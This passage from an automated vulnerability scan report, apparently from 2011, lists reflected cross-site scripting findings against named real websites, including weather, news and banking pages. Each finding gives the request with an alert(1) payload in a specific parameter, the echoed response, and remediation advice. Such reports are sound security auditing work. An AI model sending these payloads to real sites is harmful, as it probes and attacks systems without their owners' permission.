This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:56 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Thu, 03 Feb 2011 17:13:56 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... Type; return ret; }
The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:57 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN)
Cache-Control: max-age=3420
Expires: Thu, 03 Feb 2011 17:13:57 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale ...[SNIP]...
The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:10 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3300
Expires: Thu, 03 Feb 2011 17:14:10 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... edAttrs["type"] = mimeType; return ret; }
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:21 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3060
Expires: Thu, 03 Feb 2011 17:07:21 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale ...[SNIP]...
The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:38 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:09:38 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:31 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Thu, 03 Feb 2011 17:05:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... "] = mimeType; return ret; }
The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:18:53 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:11:53 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:32 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN)
Cache-Control: max-age=2820
Expires: Thu, 03 Feb 2011 17:04:32 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... uginsPage; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" /> ...[SNIP]...
1.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" /> ...[SNIP]...
1.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://offers.amexnetwork.com
Path: /portalext/inline/back_support_mock_ie.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1
Host: offers.amexnetwork.com
Proxy-Connection: keep-alive
Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 15:39:08 GMT
Date: Thu, 03 Feb 2011 15:39:08 GMT
Connection: close
Content-Length: 125
<script> function getLocation() { return '457ed'-alert(1)-'43bbf2ba26d=1'; }
The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:22:55 GMT
Date: Thu, 03 Feb 2011 14:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215250
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:28:36 GMT
Date: Thu, 03 Feb 2011 14:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:27:34 GMT
Date: Thu, 03 Feb 2011 14:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 291329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:29:41 GMT
Date: Thu, 03 Feb 2011 14:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... .do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923', { method:'GET', onComplete:parseXml }); } function parseXml(response) { var responseXml = response.responseXML; //alert(responseXml); var m ...[SNIP]...
The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinecheckingsbanking.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1
Host: peoplesbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;
Response
HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Cache-Control: no-cache
Content-type: text/html
Connection: close
Date: Thu, 03 Feb 2011 15:41:42 GMT
Server: lighttpd
Content-Length: 18861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="au ...[SNIP]... <span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span> ...[SNIP]...
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
